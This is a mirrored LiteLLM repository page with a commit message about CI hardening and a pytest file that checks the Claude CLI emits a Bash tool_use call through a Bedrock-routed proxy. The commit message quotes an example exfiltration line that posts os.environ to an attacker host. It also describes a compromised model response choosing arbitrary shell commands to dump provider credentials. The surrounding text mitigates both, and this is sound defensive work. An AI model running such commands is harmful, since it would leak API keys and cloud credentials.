mirror of
https://github.com/BerriAI/litellm.git
synced 2026-09-22 00:31:44 +00:00
Address two new Veria comments (2026-05-18T00:10:41Z) on the
claude_code_compat_pr_gate job:
1. .circleci/config.yml (Veria: provider credentials exposed to PR code)
The pytest step runs PR-controlled test code (anything under
tests/claude_code/) and the CircleCI job env carries the provider
creds used to start the proxy container. A malicious PR could add
`requests.post(attacker, data=os.environ)` to any test or
conftest hook and exfiltrate ANTHROPIC_API_KEY / AWS_* /
VERTEXAI_* / AZURE_FOUNDRY_* / GITHUB_TOKEN.
Pytest only needs to talk to the proxy at localhost:4000, so the
credentials are not legitimately required in pytest's env. Wrap
the invocation in `env -i` with a minimal allowlist (PATH /
HOME / USER / TERM / LANG / LC_ALL / TMPDIR + the four
proxy/result-path vars pytest actually reads). Pinned by a new
test in test_circleci_pr_gate_wiring.py so the scrub cannot
silently regress.
2. tests/claude_code/{tool_use,tool_use_streaming,thinking_with_tool_use}
(Veria: model-controlled Bash execution in CI)
The three Bash-using feature directories passed `--allowed-tools
Bash` unrestricted, which lets a compromised provider response
choose any host command to run instead of `echo pong`. On the
PR-gate machine executor that command could `docker inspect
compat-proxy` to dump provider creds from the proxy container.
Tighten every Bash-using cell (15 files total, 5 providers × 3
feature dirs) to:
- --allowed-tools 'Bash(echo pong)' — exact-match pattern per
Claude Code's permission rule syntax. A different command
does not match the allow rule.
- --permission-mode dontAsk — auto-denies tool calls outside the
allow rule instead of falling back to the headless default
(which would defeat the explicit-allow contract).
thinking_with_tool_use prompts are tightened to pin the command
to 'echo pong' so the cell can run under the new restriction
while still exercising the thinking + tool_use shape.
Pinned by a new parametrized test (15 cells × 2 properties = 30
cases) in test_bash_tool_restrictions.py.
The model-Bash mitigation is layered on top of the existing
cli_driver env allowlist (which already scrubs provider creds from
the CLI subprocess env, so even a malicious `echo $ANTHROPIC_API_KEY`
prints nothing) and the build-and-test branch filter (which keeps
external forks from running this job at all). It is not a substitute
for a fully sandboxed CLI runner; the residual risk of Claude Code's
built-in read-only `echo` auto-approve is documented in the per-cell
comments alongside the restriction.
All 223 tests/claude_code/ unit tests pass.
Co-authored-by: Cursor Agent <cursoragent@cursor.com>
119 lines
3.6 KiB
Python
119 lines
3.6 KiB
Python
"""tool_use x Bedrock (Invoke).
|
|
|
|
Drive the real `claude` CLI against a running LiteLLM proxy that routes
|
|
Claude requests to AWS Bedrock via the legacy `InvokeModel` API path,
|
|
ask Claude to invoke a built-in tool (`Bash`), and assert that the
|
|
upstream returned a `tool_use` content block.
|
|
|
|
The (feature, provider) for this cell is inferred from the file path by
|
|
`tests/claude_code/conftest.py`:
|
|
|
|
tests/claude_code/tool_use/test_bedrock_invoke.py
|
|
^^^^^^^^ ^^^^^^^^^^^^^^
|
|
feature_id provider
|
|
"""
|
|
|
|
from __future__ import annotations
|
|
|
|
import os
|
|
from typing import Any, Mapping, Sequence
|
|
|
|
import pytest
|
|
|
|
from tests.claude_code.cli_driver import (
|
|
ClaudeCLIError,
|
|
failure_diagnostic,
|
|
run_claude_models_parallel,
|
|
)
|
|
|
|
PROXY_BASE_URL_ENV = "LITELLM_PROXY_BASE_URL"
|
|
PROXY_API_KEY_ENV = "LITELLM_PROXY_API_KEY"
|
|
|
|
BEDROCK_INVOKE_MODELS = [
|
|
"claude-haiku-4-5-bedrock-invoke",
|
|
"claude-sonnet-4-6-bedrock-invoke",
|
|
"claude-opus-4-7-bedrock-invoke",
|
|
]
|
|
|
|
TOOL_USE_PROMPT = (
|
|
"Use the Bash tool to run the command `echo pong` and report what it printed."
|
|
)
|
|
# Bash is restricted to the exact command `echo pong` + `dontAsk`
|
|
# permission mode; see `tool_use/test_anthropic.py` for the security
|
|
# rationale.
|
|
TOOL_USE_ARGS = [
|
|
"--allowed-tools",
|
|
"Bash(echo pong)",
|
|
"--permission-mode",
|
|
"dontAsk",
|
|
]
|
|
|
|
|
|
def _has_tool_use_event(events: Sequence[Mapping[str, Any]]) -> bool:
|
|
for event in events:
|
|
if event.get("type") != "assistant":
|
|
continue
|
|
message = event.get("message") or {}
|
|
content = message.get("content")
|
|
if not isinstance(content, list):
|
|
continue
|
|
for block in content:
|
|
if isinstance(block, dict) and block.get("type") == "tool_use":
|
|
return True
|
|
return False
|
|
|
|
|
|
def test_tool_use_bedrock_invoke(compat_result):
|
|
"""Drive the `claude` CLI against the LiteLLM proxy and assert a
|
|
tool call was emitted on the wire."""
|
|
base_url = os.environ.get(PROXY_BASE_URL_ENV)
|
|
api_key = os.environ.get(PROXY_API_KEY_ENV)
|
|
if not base_url or not api_key:
|
|
compat_result.set(
|
|
{
|
|
"status": "fail",
|
|
"error": (
|
|
f"missing required env: set {PROXY_BASE_URL_ENV} and "
|
|
f"{PROXY_API_KEY_ENV} to point at a running LiteLLM proxy"
|
|
),
|
|
}
|
|
)
|
|
pytest.fail(
|
|
f"{PROXY_BASE_URL_ENV} / {PROXY_API_KEY_ENV} not configured", pytrace=False
|
|
)
|
|
|
|
outcomes = run_claude_models_parallel(
|
|
models=BEDROCK_INVOKE_MODELS,
|
|
prompt=TOOL_USE_PROMPT,
|
|
base_url=base_url,
|
|
api_key=api_key,
|
|
extra_args=TOOL_USE_ARGS,
|
|
)
|
|
|
|
failures = []
|
|
for model in BEDROCK_INVOKE_MODELS:
|
|
outcome = outcomes[model]
|
|
if isinstance(outcome, ClaudeCLIError):
|
|
error = f"[{model}] {outcome}"
|
|
compat_result.add({"status": "fail", "error": error})
|
|
failures.append(error)
|
|
continue
|
|
|
|
if outcome.exit_code != 0:
|
|
error = f"[{model}] claude CLI failed: {failure_diagnostic(outcome)}"
|
|
compat_result.add({"status": "fail", "error": error})
|
|
failures.append(error)
|
|
continue
|
|
|
|
if not _has_tool_use_event(outcome.events):
|
|
error = (
|
|
f"[{model}] no tool_use content block observed in stream-json events"
|
|
)
|
|
compat_result.add({"status": "fail", "error": error})
|
|
failures.append(error)
|
|
continue
|
|
|
|
compat_result.add({"status": "pass"})
|
|
|
|
if failures:
|
|
pytest.fail("; ".join(failures), pytrace=False)
|